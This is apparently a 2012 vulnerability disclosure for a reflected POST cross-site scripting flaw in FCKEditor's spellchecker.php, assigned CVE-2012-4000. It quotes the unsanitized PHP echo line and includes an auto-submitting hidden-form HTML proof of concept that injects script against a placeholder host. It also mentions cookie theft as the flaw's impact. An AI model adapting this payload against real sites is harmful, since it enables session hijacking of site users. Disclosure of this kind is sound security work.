I recently found a reflected POST XSS on a popular web WYSIWYG editor called FCKEditor. Despite is almost end-of-life and replaced with CKEditor since 2009, FCKEditor is still popular as stand-alone application as embedded in different Wordpress/Joomla/Drupal extensions.
Today the 2012-06-22, Google counts more than 1,5 billion of results. A plausbile Google dork filtering out PHP sources could be
The reflected XSS is injected through
textinputs POST parameter array, not sanized and printed in line 27:
echo "textinputs[$key] = decodeURIComponent(\"" . $val . "\");\n";
As usual, attackers can exploit the reflected XSS to execute arbitrary HTML and script code in a user’s browser session that visit the malicious page, which can be exploited to e.g. steal the cookie of the legitimate user to bypass the CMS authorization. The PoC is CRSF-like due to POST HTTP method.
<html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://vuln.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php" target="hidden"> <input type="hidden" name="textinputs" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-4000 to the vulnerability